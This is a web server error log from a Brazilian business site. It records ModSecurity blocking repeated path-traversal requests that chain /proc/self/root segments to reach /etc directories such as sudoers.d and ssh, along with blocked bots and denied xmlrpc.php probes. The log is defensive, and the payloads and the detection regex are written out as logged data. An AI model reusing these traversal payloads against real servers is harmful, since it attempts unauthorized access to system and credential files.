[Wed Mar 18 11:18:37.063586 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:50448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0Pew_le52K8_3pV3lywAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 11:18:43.581823 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.228.61:58682] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq0QwkwaGbbGflqUZAVvgAAAMA"]
[Wed Mar 18 11:18:47.285167 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.244.43:51938] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq0R-yqAr6etmhZHNrGzwAAAEU"]
[Wed Mar 18 11:18:49.023983 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:50458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0SUzinOy1jxa1j4cbOgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:18:50.328482 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:37810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0StY0UrI5A3LftIyzTgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:18:52.754096 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:37810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0TNY0UrI5A3LftIyzVwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:18:57.290601 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:58318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0UdY0UrI5A3LftIyzXQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:19:07.766662 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:37824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0W-w_le52K8_3pV3l7QAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:19:16.613338 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:48104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0ZNY0UrI5A3LftIyzfgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:19:22.221790 2026] [mime_magic:error] [pid 31803:tid 140411658000128] (70014)End of file found: [client 57.141.18.27:39878] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:19:25.142992 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:37692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0bdY0UrI5A3LftIyzkgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:19:32.597785 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:43764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0dOoXxyEfFpUF8f9zPQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:19:45.838161 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:46174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0gdY0UrI5A3LftIyzswAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:20:14.245217 2026] [access_compat:error] [pid 30077:tid 140411691570944] [client 194.32.122.56:16110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:18.499157 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:43306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0okzinOy1jxa1j4cbcgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:20:24.899153 2026] [access_compat:error] [pid 15826:tid 140411691570944] [client 149.22.87.154:37756] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:27.406013 2026] [access_compat:error] [pid 19507:tid 140411582465792] [client 185.220.101.7:24856] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:35.546599 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:33560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0swkwaGbbGflqUZAWIAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:20:38.906721 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:44508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0ttY0UrI5A3LftIyz3gAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:20:50.396038 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:52548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0wtY0UrI5A3LftIyz9AAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:20:50.872608 2026] [access_compat:error] [pid 11816:tid 140411725141760] [client 51.210.104.244:42263] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:51.528388 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:47256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0w-yqAr6etmhZHNrHHAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:20:51.930743 2026] [access_compat:error] [pid 15051:tid 140411741927168] [client 51.210.111.19:58995] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:53.508467 2026] [access_compat:error] [pid 15826:tid 140411691570944] [client 185.220.100.242:48166] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:53.530814 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:50170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0xeyqAr6etmhZHNrHIAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:20:56.101023 2026] [access_compat:error] [pid 19507:tid 140411565680384] [client 46.38.236.103:24000] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:20:57.692608 2026] [access_compat:error] [pid 17653:tid 140411548894976] [client 185.220.101.152:60311] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:08.047348 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:40668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq1TPu8EFLIOrSqIpsKNQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:23:17.368502 2026] [mime_magic:error] [pid 31803:tid 140411641214720] (70014)End of file found: [client 57.141.18.55:47918] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:23:26.134815 2026] [access_compat:error] [pid 11816:tid 140411632822016] [client 191.96.67.3:7643] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:29.027092 2026] [access_compat:error] [pid 15051:tid 140411649607424] [client 188.214.125.48:53509] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:34.815105 2026] [mime_magic:error] [pid 31803:tid 140411607643904] (70014)End of file found: [client 57.141.18.114:48578] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:23:40.825915 2026] [access_compat:error] [pid 31803:tid 140411557287680] [client 107.189.5.7:27216] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:43.935498 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.228.61:44114] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq1b9a6ubjKNq_cu4ahMwAAA04"]
[Wed Mar 18 11:23:47.887785 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.244.43:45976] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq1c9a6ubjKNq_cu4ahOAAAA0E"]
[Wed Mar 18 11:23:48.983977 2026] [access_compat:error] [pid 19507:tid 140411557287680] [client 203.55.81.2:44616] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:50.178123 2026] [access_compat:error] [pid 15826:tid 140411574073088] [client 45.66.35.31:39344] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:52.567171 2026] [access_compat:error] [pid 17653:tid 140411716749056] [client 45.84.107.17:29139] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:54.043008 2026] [access_compat:error] [pid 19507:tid 140411624429312] [client 51.210.104.134:48497] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:23:58.458199 2026] [access_compat:error] [pid 31803:tid 140411616036608] [client 45.80.158.165:41554] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:24:12.113460 2026] [access_compat:error] [pid 17887:tid 140411557287680] [client 195.123.216.134:34892] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:24:56.670774 2026] [access_compat:error] [pid 30077:tid 140411691570944] [client 185.220.101.12:46124] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
